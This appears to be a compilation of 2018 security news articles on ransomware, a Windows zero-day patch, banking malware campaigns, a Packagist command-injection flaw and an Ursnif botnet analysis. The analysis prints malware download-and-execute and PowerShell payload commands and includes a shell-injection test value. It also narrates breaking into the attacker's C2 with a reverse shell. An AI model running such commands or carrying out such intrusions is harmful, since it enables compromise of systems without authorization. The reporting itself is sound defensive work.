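                report["tail_mismatch"].append(name)
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_FILES, SAMPLE_ORIGINALS).items():
        print(f"{key}: {value}")
```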

Files encrypted by CryptoNar
When done encrypting the files, it then sends the public/private key pair to the attacker via email.

Send keys via SMTP
CryptoNar will then drop a ransom note named CRYPTONAR RECOVERY INFORMATION.txt that asks the victim to send $200 in bitcoins to the enclosed bitcoin address. When sending the coins, the attacker instructs the victim to enter their email address and listed ID in the "extra note" field of the bitcoin transaction.

Ransom Note
A decryptor is then launched that waits for the victim to enter the private key they would supposedly receive after paying the ransom.

Crypto Nar Version 1.0

It is not known if the attacker will actually try and help a victim after they pay, but at this point it does not matter as there is a free decryptor available.

Free CryptoNar Decryptor created
The good news is that Michael Gillespie was able to create a free decryptor for CryptoNar that allows victims to get their files back for free.

Michael Gillespie
Here's a free decrypter for CryptoJoker / CryptoNar #Ransomware (extensions ".cryptojoker" / ".cryptoNar"). Just requires either an encrypted/original file, or one encrypted file of a common type (e.g. .jpg, .png, .pdf, .doc, etc). …

1:05 AM - Aug 29, 2018

To use the decryptor, make sure you have both an encrypted file and its original counterpart, and then download the decryptor. When looking for encrypted/non-encrypted pairs, a common file type such as .jpg, .png, .pdf, .doc, .xls, etc. will do.
When ready, run the decryptor, select Settings, and then select Brute Forcer. Once in the brute forcer, select both of the requested files and click Start. The decryptor will then use the selected files to brute force the decryption key.

When one is found, close the Brute Forcer screen and the key should be loaded. Now click on Select Directory, select the C: drive, and click on the Decrypt button.

Files decrypted
Your files should now be decrypted.

Third-Party researchers released micropatch for recently disclosed Windows Zero-Day
2.9.2018 securityaffairs

Security researchers from the 0patch community released a micropatch for the recently disclosed Windows zero-day vulnerability.
A few days ago, the security researcher behind the Twitter account @SandboxEscaper disclosed the details of a zero-day privilege escalation vulnerability affecting Microsoft’s Windows operating systems that could be exploited by a local attacker or malicious program to obtain SYSTEM privileges on the vulnerable system.

The vulnerability resides in the Windows Task Scheduler and is tied to errors in the handling of the Advanced Local Procedure Call (ALPC) facility.

Microsoft is expected to address the vulnerability in the September Patch Tuesday, scheduled for September 11; in the meantime, a patch was released by 0patch, a community of experts that aims at addressing software flaws.

The community is known for developing tiny patches, usually less than 30 bytes in size, and it released a fix within 24 hours of the public disclosure of the issue.

The fix for the Windows zero-day recently disclosed is only 13 bytes in size.

The experts explained that they have validated and verified the micropatch for @SandboxEscaper’s LPE in Task Scheduler, which currently applies only to fully updated 64-bit Windows 10 1803.

Aug 29, 2018
Okay people, 24 hours after the 0day was published we have a micropatch candidate for @SandboxEscaper's LPE in Task Scheduler. As you can see, scheduler's access to user-controlled hardlink is impersonating the user and gets ACCESS DENIED.

Validated and verified, our micropatch for @SandboxEscaper's LPE in Task Scheduler is now published and freely available for everyone to use. It currently applies only to fully updated 64bit Windows 10 1803. We welcome requests for ports to other versions at

2:19 PM - Aug 30, 2018
“As the researcher’s POC demonstrates, one can use this vulnerability to replace a system executable file and wait for a privileged process to execute it. In particular, it was shown that a printing-related DLL could be replaced and then executed by triggering the Print Spooler Service to load it,” reads the analysis published by 0patch.

“SandboxEscaper’s documentation properly identifies the problem being in Task Scheduler’s SchRpcSetSecurity method, which is externally accessible via Advanced Local Procedure Call (ALPC) facility.”

This is just a temporary fix; Windows users are advised to apply the official Microsoft update as soon as it becomes available.

0patch warns of unexpected errors that could be caused by the unofficial fix they released.

“Can we keep using this micropatch instead of applying Microsoft’s update?

We strongly recommend against that. Microsoft’s update will not only fix this issue in a more informed way, but will also bring fixes for other vulnerabilities that we don’t have micropatches for. Yes, we hate losing hours of our lives to updating our systems too, but wouldn’t dream of outright replacing official updates with our micropatches 😉 ” concludes 0patch.

Fappening case – Another hacker who leaked celebrities’ naked photos was sentenced to 8 months in prison
2.9.2018 securityaffairs Privacy

Fappening – The hacker George Garofano (26), who leaked celebrities’ naked photos and attempted to trade them, was sentenced to 8 months in prison.
The sentence for the fourth hacker involved in the leak of celebrities’ naked photos, also known as the Fappening case, has arrived. George Garofano, 26, of North Branford, has been sentenced to eight months in prison; he was charged earlier this year with hacking into over 250 Apple iCloud accounts belonging to Hollywood celebrities.

As part of the Fappening case, nude pictures of many celebrities were leaked online; the list of victims is long and includes Kim Kardashian, Kate Upton, and Jennifer Lawrence.

Garofano had been arrested by the FBI and was charged in federal court with violating the Computer Fraud and Abuse Act.

From April 2013 through October 2014, Garofano used phishing attacks against the victims to obtain their iCloud accounts credentials, access the accounts and steal personal information, including private photographs and videos.

Garofano also traded the stolen credentials, as well as the information he stole from the victims’ accounts, with other individuals.

In a plea agreement signed in January in U.S. District Court in Los Angeles, Garofano agreed to plead guilty to one count of unauthorized access to a protected computer to obtain information.

Prosecutors requested a sentence of at least 10 to 16 months in prison for the man, while his lawyer asked for a sentence of no more than ten months, half of which under home confinement.

The final decision of a judge at the US district court in Bridgeport sentenced Garofano to 8 months in prison and 3 years of supervised release after his prison term is over.

“John H. Durham, United States Attorney for the District of Connecticut, announced that GEORGE GAROFANO, 26, of North Branford, was sentenced today by U.S. District Judge Victor A. Bolden in Bridgeport to eight months of imprisonment, followed by three years of supervised release, for engaging in a phishing scheme that gave him illegal access to more than 200 Apple iCloud accounts, many of which belonged to members of the entertainment industry.” reads the press release published by the Department of Justice.

“GAROFANO, who is released on a $50,000 bond, was ordered to report to prison on October 10, 2018. Judge Bolden ordered GAROFANO to perform 60 hours of community service while on supervised release.”

The other hackers involved in the Fappening case are Edward Majerczyk, Ryan Collins, and Emilio Herrera; the latter is still awaiting sentencing.

Garofano was the only one who traded the stolen iCloud credentials and the celebrities’ naked photos.

Cobalt cybercrime gang targets Russian and Romanian banks
2.9.2018 securityaffairs CyberCrime

On August 13, ASERT observed the Cobalt crime gang actively pushing a new campaign aimed at institutions in Eastern Europe and Russia.
Security experts from Netscout’s ASERT uncovered a new campaign carried out by the Cobalt cybercrime group.

The attacks were detected on August 13, 2018; the experts revealed that the hackers also targeted NS Bank in Russia and Carpatica/Patria in Romania.

The Cobalt crime gang has been active since at least 2016 and has targeted banks worldwide.

Cobalt hackers leverage spear-phishing emails to compromise target systems; the messages spoof emails from financial institutions or from a financial supplier or partner.

The new campaign discovered by Netscout’s ASERT researchers presents a novelty: one of the phishing emails sent by Cobalt contains two separate malicious URLs, one pointing to a weaponized Word document and the other to a binary with a .jpg extension.

The experts also detected two malware samples used in the campaign: a JavaScript backdoor and a second piece of malicious code tracked as COOLPANTS, a reconnaissance backdoor associated with the group.

COOLPANTS borrows code from the CobInt backdoor: 28 of its 57 functions matched when the two binaries were compared with Diaphora, a binary diffing tool.

The backdoor connects to hxxps://apstore[.]info, a domain already identified by researchers from Proofpoint as a command and control for Cobalt malware.

2831589 - ETPRO TROJAN Cobalt Group Downloader (apstore .info in DNS Lookup) (trojan.rules)
2831590 - ETPRO TROJAN Cobalt Group Downloader (apstore .info in TLS SNI) (trojan.rules)
On 13 August 2018, experts from ASERT detected a new sample of COOLPANTS compiled on 1 August 2018. This sample uses rietumu[.]me as its C2; analysis of the domain led to the email address solisariana[@]protonmail[.]com, which is associated with five other new domains, all created on 1 August 2018 (compass[.]plus; eucentalbank[.]com; europecentalbank[.]com; inter-kassa[.]com; and unibank[.]credit).

The domains were clearly used to target the financial institutions.

“Hunting for samples associated with inter-kassa[.]com leads to a phishing email uploaded to VirusTotal, d3ac921038773c9b59fa6b229baa6469. At the time of analysis, VirusTotal scored the phishing email with a 0, indicating nothing malicious was identified by the anti-virus engines.” reads the report.

“Most of the email content appears benign except for a link embedded in the message. The name “Interkassa” appears to be a payment processing system which makes it a prime masquerading target for attackers as noted in the tactics employed by the Cobalt Group for this ongoing campaign.”

The experts used the inter-kassa domain to search for associated malicious campaigns and found only a spear-phishing email dated 2 August 2018, addressed to NS Bank and purportedly sent by “Interkassa.” The mail pretends to come from Denys Kyrychenko, co-owner and CTO of Interkassa.

The phishing message includes two malicious links; one of them points to a weaponized Word document with an embedded VBA script. If the victim enables macros, the script generates a cmd.exe command that launches cmstp.exe with an INF file. The INF file connects to the C2 to fetch a payload, which cmstp.exe then executes.

The attackers used a JavaScript backdoor, tracked as ‘more_eggs,’ that is identical to a backdoor discovered last year by Trend Micro and attributed to the Cobalt cybercrime gang.

The backdoor supports the following commands that allow Cobalt to take over an infected system:

d&exec – Downloads and executes a PE file.
more_eggs – Downloads an update for itself.
gtfo – Deletes itself and related registry entries.
more_onion – Executes the “new” copy of itself.
vai_x – Executes a command via cmd.
The second link in the spear-phishing email connects to the C2 to download an executable rather than an image file. Unfortunately, at the time of analysis, the C2 was not responding.

ASERT also discovered another campaign, allegedly linked to the Cobalt group, targeting the Romanian bank carpatica[.]ro by masquerading as the Single Euro Payments Area (SEPA).

“ASERT believes Cobalt Group will continue targeting financial organizations in Eastern Europe and Russia based on the observables in this campaign and their normal modus operandi.” concludes ASERT.

“ASERT also recommends that employees are trained to spot phishing emails and, where possible, closely inspect emails for look-alike domains that might contain malicious attachments or links.”

Further details, including IoCs, are reported in the analysis published by the researchers.

Third-Party Patch Released for Windows Zero-Day
31.8.2018 securityweek 

A patch is available for a Windows zero-day that became public knowledge earlier this week, but it’s not from Microsoft.

Instead, the fix comes from 0patch, a community project that aims to address software vulnerabilities by delivering tiny fixes to users worldwide. The patches are indeed tiny, usually less than 30 bytes in size.

The fix for this week’s vulnerability is also very small, at only 13 bytes. It was released within 24 hours of the bug being disclosed on Twitter on Monday and, having been validated and verified, is now rolling out to users.

Aug 29, 2018 (Twitter): “Okay people, 24 hours after the 0day was published we have a micropatch candidate for @SandboxEscaper's LPE in Task Scheduler. As you can see, scheduler's access to user-controlled hardlink is impersonating the user and gets ACCESS DENIED.”

Aug 30, 2018 (Twitter): “Validated and verified, our micropatch for @SandboxEscaper's LPE in Task Scheduler is now published and freely available for everyone to use. It currently applies only to fully updated 64bit Windows 10 1803. We welcome requests for ports to other versions at”

The vulnerability was discovered in the Windows Task Scheduler’s Advanced Local Procedure Call (ALPC) interface and was confirmed to impact at least Windows 10 64-bit machines. CERT/CC issued an alert soon after details on the bug were posted online along with proof-of-concept (PoC) code.

“As the researcher's POC demonstrates, one can use this vulnerability to replace a system executable file and wait for a privileged process to execute it. In particular, it was shown that a printing-related DLL could be replaced and then executed by triggering the Print Spooler Service to load it,” 0patch points out in a blog post.

The issue resides in Task Scheduler's SchRpcSetSecurity method, which is externally accessible via ALPC. The method can be called by any local process and sets a desired security descriptor (sddl) on a task or folder.

Because the method “fails to impersonate the requesting client when setting the security descriptor,” Task Scheduler changes the access control list of the chosen file or folder as Local System user for all users, even low-privileged ones.

While the micropatch fully addresses the issue, preventing even variations of the exploit from triggering the vulnerability, users are advised to apply a Microsoft-supplied fix as soon as one becomes available. The unofficial fix might also cause unexpected errors, 0patch warns.

Microsoft’s next set of patches is expected to arrive on September 11 and an official fix for this 0-day is highly likely to be delivered then.

Researchers Draw Connections Between APTs
31.8.2018 securityweek  APT

A newly discovered threat group shares similarities with three advanced persistent threats (APTs), Trend Micro security researchers have discovered.

Referred to as Urpage, the actor is connected to the hacking groups known as Bahamut, Confucius, and Patchwork. Trend Micro found a connection between Confucius and Patchwork in early 2018, but continued the investigation and discovered further evidence of similarities between the groups.

Also known as Dropping Elephant and Chinastrats, Patchwork is a cyberespionage group that was associated with various attacks last year. Operating out of the Indian subcontinent, it targets various entities, including United States-based think tanks.

Urpage, which targets InPage (a word processor for Urdu and Arabic languages under Windows and Mac and a de facto standard Urdu publishing tool), is using a Delphi backdoor component that links it to Confucius and Patchwork, as well as Bahamut-like malware, Trend Micro reveals.

Specifically, the actor is using Android malware that matches Bahamut’s code, but which connects to its own command and control (C&C) infrastructure. Some of these C&C servers also act as phishing sites and attempt to lure users into downloading malicious applications via links to Google Play (the programs are no longer available in the portal).

However, not all C&C websites advertise malicious applications, the security researchers warn. Some of them only contain a random template with empty categories.

Urpage’s malicious programs are designed to steal information from the compromised machines, just as Bahamut’s applications do. They can retrieve network information and the MAC address, steal SMS messages and contacts, record audio, retrieve GPS location, and steal files with specific extensions.

One of the applications works on top of a modified version of the legitimate Threema end-to-end encrypted messaging software to steal screenshots of messages. While the modified app works normally, the malicious code, which is hidden from the user, takes screenshots every 10 seconds.

The attacker-linked websites also host malicious documents that link Urpage to other threat actors. These include an RTF file that exploits CVE-2017-8750 and an InPage file that exploits CVE-2017-12824, both of which drop VB backdoors.

Trend Micro discovered that Urpage uses the same Delphi file stealer as the threat actor Confucius, and also that the two are linked via a couple of malicious RTF files that download a similar script.

With the Patchwork group also using the Delphi file stealer, the three groups appear related in some form. The link with Patchwork is further strengthened by an Android application that features code similar to that of Bahamut and a C&C that uses the registration pattern of Patchwork’s group, along with infrastructure close to an old Patchwork domain.

“The many similarities and connections show that threat actors do not work in isolation, and that attacks do not necessarily appear from out of nowhere. This may even suggest that a single development team may be behind this attack — maybe a single paid group that has sold its tools and services to other groups with different goals and targets,” Trend Micro concludes.

Hackers Hit Air Canada Mobile App
31.8.2018 securityweek  Mobil

Air Canada this week notified customers of malicious activity around its mobile app and prompted users to reset their passwords, as a precautionary measure.

The company says it detected unusual login behavior with its mobile application between Aug. 22 and 24, 2018, and that the password reset was the result of that incident.

“We immediately took action to block these attempts and implemented additional protocols to protect against further unauthorized attempts. As an additional security precaution, we have locked all Air Canada mobile App accounts to protect our customers’ data,” the company said.

Out of the 1.7 million Air Canada mobile App user profiles, approximately 20,000 profiles might have been improperly accessed during the attack and the company says it is contacting potentially affected customers directly.

However, all of the company’s mobile users were asked to reset their passwords using improved password guidelines.

Air Canada says users’ credit card information is protected, but recommends keeping an eye on all transactions. The basic profile data stored on the mobile app account includes name, email address, and telephone number.

However, users may also add their Aeroplan number, passport number, NEXUS number, Known Traveler Number, gender, birthdate, nationality, passport expiration date, passport country of issuance, and country of residence. The Aeroplan password is not stored in the app.

“Credit cards that are saved to your profile are encrypted and stored in compliance with security standards set by the payment card industry or PCI standards,” the company says.

As Mark Sangster, VP and industry security strategist at Canada-based cyber security company eSentire, told SecurityWeek in an emailed statement, one major issue related to this incident is that many of Air Canada’s users are frequent travelers who spend in different countries and geographies, thus “making it harder for credit card providers to identify anomalous spending tied to their accounts.”

He also applauds Air Canada’s swift reaction to the incident, noting that “the window between the point of detection and point of response is critical.” The sooner users learn about a data breach, the quicker they can take action to secure sensitive information.

Matt Chiodi, VP of Cloud Security at RedLock, agrees. “It’s important to note that were it not for the swift actions of Air Canada’s security teams, it could have been exponentially worse since the 20,000 records that were accessed only represented 1% of their overall database,” Chiodi said in an emailed comment.

“As the frequency and voracity of cyberattacks continue to increase, privacy and protection laws, such as the ones introduced in Europe (General Data Protection Rules), and here in Canada with the Personal Information Protection and Electronic Documents Act (PIPEDA), become more critical. These laws need to tighten, ensuring companies have well understood rules and triggers for privacy and data breach notification, timelines for response, and fully understand their obligations when it comes to protecting the information of its employees and customers. Until then, it’s open season on our data and hard-earned wealth,” Sangster concluded.

Critical Vulnerability Patched in PHP Package Repository
31.8.2018 securityweek 

A critical remote code execution vulnerability was recently addressed in Packagist, a large PHP package repository, a security researcher reveals.

An open source project, Packagist is the default package server behind Composer, a tool for dependency management in PHP, as it aggregates public PHP packages installable with the utility. The site helps users search for packages and lets Composer know where to get the code from.

Statistics on the website show that Packagist has delivered billions of packages since its inception in 2012, and that it is currently serving around 400 million package installs per month.

What security researcher Max Justicz discovered was that there was a “big text field on the site” that allowed anyone to type $(execute me), which would result in the command being executed in a shell.

The issue, Justicz says, resided in the package repository’s functionality that allows users to upload packages.

“You upload packages to Packagist by providing a URL to a Git, Perforce, Subversion, or Mercurial repository. To identify what kind of repository the URL points to, Packagist shells out to git, p4, svn, and hg, with application-specific commands that include this URL as an argument,” the researcher notes.

However, when checking the provided URL, Packagist failed to properly escape the input, so any command an attacker embedded in the URL was executed, twice in fact.

“The Packagist team quickly resolved this issue by escaping the relevant parameters in the Composer repository,” Justicz reveals.
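The class of bug described above, as an added Python illustration (not Packagist’s or Composer’s code): a repository URL spliced into a shell command string lets command substitution inside the URL run on the server, whereas an argv list with no shell, or quoting each untrusted argument, passes it through as a literal. The URLs, the allowlist regex and the use of `printf` in place of the real VCS client are assumptions.

```python
import re
import shlex
import subprocess

# Constructed inputs: the second one carries sh command substitution, the class of
# input the Packagist report describes ("$(execute me)"); here it only echoes a marker.
CLEAN_URL = "https://github.com/composer/composer.git"
INJECTED_URL = "https://example.invalid/repo.git$(echo INJECTED)"

# Example allowlist for what a repository URL may look like (an assumption, not
# Packagist's rule): a known scheme followed by URL-safe characters only.
REPO_URL_RE = re.compile(r"^(?:https?|git|ssh|svn)://[A-Za-z0-9._~:/@%+-]+$")


def probe_unsafe(url: str) -> str:
    """Vulnerable pattern: the URL is spliced into a command string run by /bin/sh.
    `printf` stands in for the VCS client (git, svn, hg, p4) the server shells out to."""
    cmd = "printf '%s' " + url
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


def probe_safe(url: str) -> str:
    """Hardened pattern: argv list and no shell, so the URL is one literal argument."""
    return subprocess.run(["printf", "%s", url], capture_output=True, text=True).stdout


def quoted_command(url: str) -> str:
    """If a shell string is unavoidable, quote each untrusted argument (PHP: escapeshellarg)
    and put `--` before it so a URL starting with '-' cannot be parsed as an option."""
    return "git ls-remote -- " + shlex.quote(url)


def is_allowed_repo_url(url: str) -> bool:
    """Validate before use: reject anything that is not a plain repository URL."""
    return REPO_URL_RE.fullmatch(url) is not None


if __name__ == "__main__":
    print("unsafe :", probe_unsafe(INJECTED_URL))   # marker appended: substitution ran
    print("safe   :", probe_safe(INJECTED_URL))     # URL passed through verbatim
    print("quoted :", quoted_command(INJECTED_URL))
    print("allowed:", is_allowed_repo_url(INJECTED_URL), is_allowed_repo_url(CLEAN_URL))
```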

The security researcher, who over the past year discovered multiple issues on popular repositories, warns of the high probability that package manager servers could be compromised in the future.

“The flaw could have been easily avoided by setting parameters on what users can input into text boxes. Without parameters, text boxes become entry points for bad actors to execute malicious commands in order to access the server and, once there, potentially gain access to credentials that will let them hop from one server to another while harvesting sensitive information,” Mike Bittner, Digital Threat Analyst for The Media Trust, told SecurityWeek in an emailed comment.

“Developers should make security a priority all throughout a product's lifecycle stages, from concept to manufacturing to retirement. Website operators should police all their website third-party code providers to ensure their activities align with policies, and scan their sites to identify and obstruct unauthorized code,” Bittner concluded.

Hacking The Hacker. Stopping a big botnet targeting USA, Canada and Italy
31.8.2018 securityaffairs BotNet

Today I’d like to share a full analysis path, including a KickBack attack, which led me to gain full access to an entire Ursnif/Gozi botnet.
In other words: from a simple “Malware Sample” to “Pwn the Attacker Infrastructure”.
NB: Federal Police have already been alerted on this topic, as well as National and International CERTs/CSIRTs (on August 26/27 2018). Attacked companies and compromised hosts should already have been contacted. If you have heard nothing about this until now, it means, with high probability, that you or your company are not involved in this threat. I am not going to publicly disclose the victims’ IPs.

This disclosure follows the ethical disclosure procedure, which is close to the responsible disclosure procedure but focused mainly on incidents rather than on vulnerabilities.
Since blogging is not my business (I write on my personal blog to share knowledge on cyber security), I will describe only some of the main steps that took me to own the attacker infrastructure. I will not disclose the malware code, the malware command and control code, or details on the attacker’s group, since I won’t hand future attackers new malware source code ready to be used.
My entire “cyber adventure” began with a simple email carrying a .ZIP file named “Nuovo” as an apparently normal attachment (sha256: 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041). Inside the ZIP was a .VBS file (sha256: 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d) which, as of August 21 2018, was totally unknown to VirusTotal (unknown = not yet analysed) and was ready to get started with a double click. The VisualBasic Script (Stage1) was heavily obfuscated in order to hinder simple reverse engineering analyses, but I do like de-obfuscating hidden code (every time it’s like a personal challenge). After some hard-working minutes ( 😀 ) Stage1 was totally de-obfuscated and ready to be read in plain text. It became clear to me that Stage1 was in charge of evading three main AVs, namely Kaspersky Lab, Panda Security, and Trend Micro, by running simple scans on the Microsoft registry (Regedit), and of dropping and executing additional software.

Stage1. Obfuscation
Indeed, if none of the searched-for AVs were found on the target system, Stage1 acted as a simple downloader. The specific actions performed follow:

"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe &schtasks /create /st 01:36 /sc once /tn srx3 /tr C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe
Stage1 dropped and executed a brand new PE file named rEOuvWkRP.exe (sha256: 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c) using the native Microsoft program bitsadmin.exe. BitsAdmin.exe is a command-line tool that system administrators can use to create download or upload jobs and monitor their progress over time. This technique has been widely used by the Anunak APT during bank frauds in the past few years.

The Stage2 analysis (a huge step ahead here) brought me to yet another brand new drop-and-decrypt stager. Stage3 introduced additional layers of anti-reverse engineering. The following image shows the additional PE section with high entropy, a significant indication of decrypter activity.

Stage2. Drop and decrypt Stage3. Note the high entropy of the added section

Indeed, Stage 3 (sha256: 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e) was packed as well. UPX was used to hide the real payload, so that many AV engines were unable to detect it, since the signature differed from that of the original payload. Finally, the unpacked payload presented many interesting features; for example, it was weaponized with evasion techniques such as timing delay (through sleep), loop delay by calling the GetSystemTimeAsFileTime API 9979141 times, BIOS version harvesting, system manufacturer information gathering, and system fingerprinting to check whether it was running in a virtual or physical environment. It installed itself in the Windows auto-run registry keys to gain persistence on the victim machine. The following action was performed while running with the background flag:
cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\4CA108BF-3B6C-5EF4-2540-9F72297443C6').Audibrkr))

The final payload executed the following commands and spawned two main services (WSearch, WerSvc) on the target.

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:209921 /prefetch:2

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:406536 /prefetch:2

C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:0000000000000000

C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:65800 WinX:0 WinY:0 IEFrame:0000000000000000

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:209921 /prefetch:2

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:144390 /prefetch:2

C:\Windows\system32\SearchIndexer.exe /Embedding

taskhost.exe SYSTEM


taskhost.exe $(Arg0)

C:\Windows\System32\svchost.exe -k WerSvcGroup

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"

"C:\Windows\system32\SearchFilterHost.exe" 0 552 556 564 65536 560

"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"

"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:592 CREDAT:209921 /prefetch:2

cmd /C "nslookup > C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"

cmd /C "echo -------- >> C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"

C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"

C:\Windows\system32\WerFault.exe -u -p 2524 -s 288

"C:\Windows\system32\wermgr.exe" "-queuereporting_svc" "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_82b9a110b3b94c55171865162b471ffb8fadc7c6_cab_0ab86b12"

Stage3 finally connects back to its C2s once it has checked its own IP address. Two main C2 levels were observed:
C2 level_1 (for domains and IPs check the IoC section). Stage3 connects back to C2 level_1 to get weaponised. Level_1 command and control servers collect information on victims and deliver plugins that expand the infection’s functionality.
C2 level_2 (for domains and IPs check the IoC section). Stage3 indirectly connects to C2 level_2 in order to hand over stolen information. It’s an Ursnif/Gozi and it exfiltrates user credentials by looking for specific files, grabbing the user’s clipboard, and performing man-in-the-browser attacks against major websites such as PayPal, Gmail, Microsoft and many other online services.
So far so good. Everything looked like one of my usual analyses, but something caught my attention. The C2 level_1 had an administration panel which, from my personal point of view, was “handmade” and a pretty “young” implementation: plain HTML with no client-side controls, no clickjacking protections and no special login tokens. In keeping with Yoroi’s mission (to defend its customers), I decided to go further and try to defend people and infected companies by getting inside the entire network and collaborating with local authorities to shut it down, gathering as much information as possible in order to help federal and local police fight cyber crime.
Fortunately, I spotted a file inclusion vulnerability in the command and control which let me in! The following image shows a reverse shell I spawned on the attacker’s command and control.

Now I was able to download the entire command and control source code (PHP) and study it! The study of this brand new C2 took me to the next level. First of all, I was able to get access to the local database, where I found a lot of infected IPs (the IPs which were communicating back to C2 level_1). The following image proves that the downloaded command and control system has Macedonian dialect (Cyrillic script) in it, consistent with the Anunak APT report made by Group-IB.

Command and Control Source Code (snip)
The following image is a simple screenshot of the database dump with the victim IPs (which are undisclosed for privacy reasons).

C2 level_1 Database
Additional investigation of the database revealed new connected IPs. Those IPs were querying MySQL with administrative rights. At least two additional layers of C2 were present. While level_1 was weaponising the malware implant, level_2 was collecting information from victims. Studying the source code made it possible to find more 0-days to use against the C2 and to break into C2 level_2. Now I was able to see encrypted URLs coming from infected hosts. Important steps here are intentionally missing. Among many URLs, the analyst was able to identify a “test” connection from the attacker and focus on decrypting that connection. Fortunately, everything needed was written in the command and control source code. In this specific case, the following function was fundamental to getting to clear text!

URL Decryption Function
The eKey was right there in the DB and the decryption function was quite easy to reverse. Finally, it was possible to figure out how to decrypt the attacker’s testing string (the first transaction available in the logs) and voilà, it was possible to check in to the attacker’s email 😀!

Attacker eMail: VPS credentials
